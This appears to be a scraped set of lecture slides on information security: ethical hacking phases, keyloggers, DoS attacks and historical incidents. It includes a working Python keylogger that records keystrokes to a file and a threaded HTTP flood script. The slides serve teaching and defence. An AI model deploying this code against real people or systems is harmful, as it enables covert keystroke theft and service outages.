Download to read offline
![22
#
!@
from pynput.keyboard import Key, Listener
# File to store keystrokes
log_file = "keylog.txt"
def write_to_file(key):
with open(log_file, "a") as file:
# Replace key with printable representation
key_data = str(key).replace("'", "")
if key == Key.space:
file.write(" ")
elif key == Key.enter:
file.write("n")
elif key == Key.backspace:
file.write(" [BACKSPACE] ")
else:
file.write(key_data)
def on_press(key):
try:
write_to_file(key)
except Exception as e:
print(f"Error: {e}")
def on_release(key):
if key == Key.esc: # Stop listening when 'Escape' is pressed
return False
# Setting up the listener
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()](https://image.slidesharecdn.com/lect13-250909140035-ffd91c0f/75/Lect1_3-pptjjjjedediodheiohdioeipojihiohi-22-2048.jpg)
More Related Content
Similar to Lect1_3.pptjjjjedediodheiohdioeipojihiohi
Lect1_3.pptjjjjedediodheiohdioeipojihiohi
- 1.
- 2.
- 3. 3 # !@ Unit 1 Information Security:Attacks and Vulnerabilities Asset, Access Control, CIA, Authentication, Authorization, Risk, Threat, Vulnerability, Attack, Malware, Worms, viruses, Trojans, Spyware, Rootkits, Types of vulnerabilities: Top 10 OWASP. Types of attacks and their common prevention mechanisms: Keystroke Logging, Denial of Service (DoS /DDoS), Waterhole attack, brute force, phishing and fake WAP, Eavesdropping, Man-in-the-middle, Session Hijacking, Clickjacking, Cookie Theft, URL Obfuscation, buffer overflow, DNS poisoning, ARP poisoning, Identity Theft, IoT Attacks, BOTs and BOTNETs Case-studies: Recent attacks – Yahoo, Adult Friend Finder, eBay, Equifax, WannaCry, Target Stores, Uber, JP Morgan Chase, Bad Rabbit, Media Markt, Kaseya, JBS, Colonial Pipeline, The University of California at San Francisco.
- 4. 4 # !@ Ethical Hacking Conforming to acceptedprofessional standards of conduct What is Ethical Hacking Process of breaking into systems for: Personal or Commercial Gains Malicious Intent – Causing sever damage to Information & Assets Also Called – Attack & Penetration Testing, White-hat hacking, Red teaming White-hat - Good Guys Black-hat – Bad guys
- 5. 5 # !@ What is EthicalHacking It is Legal Permission is obtained from the target Part of an overall security program Identify vulnerabilities visible from Internet at particular point of time Ethical hackers possesses same skills, mindset and tools of a hacker but the attacks are done in a non-destructive manner
- 6. 6 # !@ Why – EthicalHacking Source: CERT-India
- 7. 7 # !@ Why – EthicalHacking Source: CERT/CC Total Number of Incidents Incidents
- 8. 8 # !@ Why – EthicalHacking Viruses, Trojan Horses, and Worms Social Engineering Automated Attacks Accidental Breaches in Security Denial of Service (DoS) Organizational Attacks Restricted Data Protection from possible External Attacks
- 9. 9 # !@ Ethical Hacking -Process 1. Preparation 2. Footprinting 3. Enumeration & Fingerprinting 4. Identification of Vulnerabilities 5. Attack – Exploit the Vulnerabilities
- 10. 10 # !@ Preparation Identification ofTargets – company websites, mail servers, extranets, etc. Signing of Contract Agreement on protection against any legal issues Contracts to clearly specifies the limits and dangers of the test Specifics on Denial of Service Tests, Social Engineering, etc. Time window for Attacks Total time for the testing Prior Knowledge of the systems Key people who are made aware of the testing
- 11. 11 # !@ Footprinting Collecting as muchinformation about the target DNS Servers IP Ranges Administrative Contacts Problems revealed by administrators Information Sources Search engines Forums Databases – whois, ripe, arin, apnic Tools – PING, whois, Traceroute, DIG, nslookup, sam spade
- 12. 12 # !@ Enumeration & Fingerprinting Specific targets determined Identification of Services / open ports Operating System Enumeration Methods Banner grabbing Responses to various protocol (ICMP &TCP) commands Port / Service Scans – TCP Connect, TCP SYN, TCP FIN, etc. Tools Nmap, FScan, Hping, Firewalk, netcat, tcpdump, ssh, telnet, SNMP Scanner
- 13. 13 # !@ Identification of Vulnerabilities Vulnerabilities Insecure Configuration Weak passwords Unpatched vulnerabilities in services, Operating systems, applications Possible Vulnerabilities in Services, Operating Systems Insecure programming Weak Access Control
- 14. 14 # !@ Identification of Vulnerabilities Methods Unpatched / Possible Vulnerabilities – Tools, Vulnerability information Websites Weak Passwords – Default Passwords, Brute force, Social Engineering, Listening to Traffic Insecure Programming – SQL Injection, Listening to Traffic Weak Access Control – Using the Application Logic, SQL Injection
- 15. 15 # !@ Identification of Vulnerabilities Tools VulnerabilityScanners - Nessus, ISS, SARA, SAINT Listening to Traffic – Ethercap, tcpdump Password Crackers – John the ripper, LC4, Pwdump Intercepting Web Traffic – Achilles, Whisker, Legion Websites Common Vulnerabilities & Exposures – http://cve.mitre.org Bugtraq – www.securityfocus.com Other Vendor Websites
- 16. 16 # !@ Attack – Exploitthe vulnerabilities Obtain as much information (trophies) from the Target Asset Gaining Normal Access Escalation of privileges Obtaining access to other connected systems Last Ditch Effort – Denial of Service
- 17. 17 # !@ Attack – Exploitthe vulnerabilities Network Infrastructure Attacks Connecting to the network through modem Weaknesses in TCP / IP, NetBIOS Flooding the network to cause DOS Operating System Attacks Attacking Authentication Systems Exploiting Protocol Implementations Exploiting Insecure configuration Breaking File-System Security
- 18. 18 # !@ Attack – Exploitthe vulnerabilities Application Specific Attacks Exploiting implementations of HTTP, SMTP protocols Gaining access to application Databases SQL Injection Spamming
- 19. 19 # !@ Attack – Exploitthe vulnerabilities Exploits Free exploits from Hacker Websites Customised free exploits Internally Developed Tools – Nessus, Metasploit Framework,
- 20. 20 # !@ Reporting Methodology ExploitedConditions & Vulnerabilities that could not be exploited Proof for Exploits - Trophies Practical Security solutions
- 21. 21 # !@ Ethical Hacking -Commandments Working Ethically Trustworthiness Misuse for personal gain Respecting Privacy Not Crashing the Systems
- 22. 22 # !@ from pynput.keyboardimport Key, Listener # File to store keystrokes log_file = "keylog.txt" def write_to_file(key): with open(log_file, "a") as file: # Replace key with printable representation key_data = str(key).replace("'", "") if key == Key.space: file.write(" ") elif key == Key.enter: file.write("n") elif key == Key.backspace: file.write(" [BACKSPACE] ") else: file.write(key_data) def on_press(key): try: write_to_file(key) except Exception as e: print(f"Error: {e}") def on_release(key): if key == Key.esc: # Stop listening when 'Escape' is pressed return False # Setting up the listener with Listener(on_press=on_press, on_release=on_release) as listener: listener.join()
- 23. 23 # !@ keystroke logging creatingrecords of everything you type on a computer or mobile keyboard monitor your computer activity while you use your devices as normal. Keyloggers are used for legitimate purposes like feedback for software development but can be misused by criminals to steal your data.
- 24. 24 # !@ How Keystroke LoggingWorks Length of the keypress Time of keypress Velocity of keypress Name of the key used
- 25. 25 # !@ Types of keystrokelogging Software keyloggers -API-based keyloggers -Form grabbing-based keylogger -Kernel-based keyloggers Hardware keyloggers -Keyboard hardware keyloggers -Hidden camera keyloggers -USB disk-loaded keyloggers
- 26. 26 # !@ keylogger Applications: employers to observeemployees' computer activities; parents to supervise their children's internet usage; device owners to track possible unauthorized activity on their devices; or law enforcement agencies to analyze incidents involving computer use.
- 27. 27 # !@ keylogger How to detectand remove keyloggers: Look for keyloggers in your running processes Check your firewall’s activity log for anything suspicious Scan and remove keyloggers with an antivirus How to protect yourself from keyloggers: Always use an antivirus Set up Firewalls Lock your PC Be careful on public or shared computers. Use reliable password manager
- 28. 28 # !@ WHAT IS “DOSATTACK” Denial-Of-Service Attack= DOS Attack is a malicious attempt by a single person or a group of people to cause the victim, site or node to deny service to it customers. DoS = when a single host attacks DDoS = when multiple hosts attack simultaneously
- 29. 29 # !@ ATTACK SIZE INGBITS-PER- SECOND
- 30. 30 # !@ ATTACK SIZE INGBITS-PER- SECOND
- 31. 31 # !@ IDEA OF “DOSATTACKS” Purpose is to shut down a site, not penetrate it. Purpose may be vandalism, extortion or social action (including terrorism) (Sports betting sites often extorted) Flood a network with traffic, thereby preventing legitimate network traffic. Disrupt connections between two machines, thereby preventing access to a service. Modification of internal data, change of programs (Includes defacement of web sites)
- 32. 32 # !@ import socket import threading # Target details target_ip = "127.0.0.1" # Replace with your test server's IP target_port = 80 # Replace with your test server's port def which_attack(): try: # Create a socket connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) # Send a lot of data sock.sendto(b"GET / HTTP/1.1rnHost: " + target_ip.encode('utf-8') + b"rnr n", (target_ip, target_port)) sock.close() except Exception as e: print(f"Error: {e}") # Create multiple threads to simulate traffic for _ in range(100): # Adjust the number of threads for testing thread = threading.Thread(target=which_attack) thread.start()
- 33. 33 # !@ Activity Morris Worm SQL Slammer
- 34. 34 # !@ HISTORY Morris Worm (November2, 1988) First DDoS attack to cripple large amounts of network infrastructure Self-replicating, self-propagating. Exploited software commonality (monoculture) 1. Fingerd buffer overflow exploit 2. Sendmail root vulnerability 3. Weak passwords
- 35. 35 # !@ HISTORY Morris Worm effect Infected systems became “catatonic” Took roughly three days to come under control Ultimately infected 10% of Internet computers (6,000) and cost $ million to clean up. Morris convicted under computer fraud and abuse act, three years probation, fine of $10,000
- 36. 36 # !@ HISTORY SQL Slammer (January,25 2003) Exploited common software (Microsoft SQL Server) as well as hardware (Intel x86), spread rapidly in a distinct monoculture. Non-destructive. Modified no data on infected system Extremely simple in construction (376 bytes) Devastating: 1. 120,000 computers infected at peak (1/26/2003) 2. Exhausted network bandwidth 3. Crashed network infrastructure (multicast state creation) 4. Shut down communication (fire-fighting) capability
- 37. 37 # !@ HISTORY SQL Slammer effect Extremely Virulent Caused economic damage outside of IT infrastructure (multiple ATM outages) Original perpetrators have never been identified or brought to justice
- 38. 38 # !@ TYPES OF DOSATTACKS
- 39. 39 # !@ TYPES OF DOSATTACKS Penetration Eavesdropping Man-In-The-Middle Flooding –syn
- 40. 40 # !@ TYPES OF DOSATTACKS Penetration Attacker gets inside your machine Can take over machine and do whatever he wants Achieves entry via software flaw(s), stolen passwords or insider access
- 41. 41 # !@ TYPES OF DOSATTACKS Eavesdropping Attacker gains access to same network Listens to traffic going in and out of your machine
- 42. 42 # !@ TYPES OF DOSATTACKS Man-in-the-Middle Attacker listens to output and controls output Can substitute messages in both directions
- 43. 43 # !@ TYPES OF DOSATTACKS Flooding Attacker sends an overwhelming number of messages at your machine; great congestion The congestion may occur in the path before your machine Messages from legitimate users are crowded out Usually called a Denial of Service (DoS) attack, because that’s the effect. Usually involves a large number of machines, hence Distributed Denial of Service (DDoS) attack
- 44. 44 # !@ MAIN TARGETS PG122 TOOL
- 45. 45 # !@ ESTONIAN CYBERWAR APRIL 27,2007 Weeks of cyber attacks followed, targeting government and banks, ministries, newspapers and broadcasters Web sites of Estonia. Some attacks took the form of distributed denial of service (DDoS) attacks (using ping floods to expensive rentals of botnets). 128 unique DDOS attacks (115 ICMP floods, 4 TCP SYN floods and 9 generic traffic floods). Used hundreds or thousands of "zombie" computers and pelted Estonian Web sites with thousands of requests a second, boosting traffic far beyond normal levels.
- 46. 46 # !@ ESTONIAN CYBERWAR APRIL 27,2007 Inoperability of the following state and commercial sites: The Estonian presidency and its parliament. Almost all of the country’s government ministries. Political parties. Three news organizations. Two biggest banks and communication’s firms. Governmental ISP. Telecom companies.
- 47. 47 # !@ ESTONIAN CYBERWAR APRIL 27,2007 The attack heavily affected infrastructures of all network: Routers damaged. Routing tables changed. DNS servers overloaded. Email servers mainframes failure, and etc.
- 48.
- 49. 49 # !@ HOW TO DEFEND Firewalls - can effectively prevent users from launching simple flooding type attacks from machines behind the firewall. Switches - Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding to detect and remediate denial of service attacks Routers - If you add rules to take flow statistics out of the router during the DoS attacks, they further slow down and complicate the matter DDS based defense Clean pipes
- 50. 50 # !@ PROSECUTION Different governmentallegislation Too expensive National interests Hard to prove who used the computer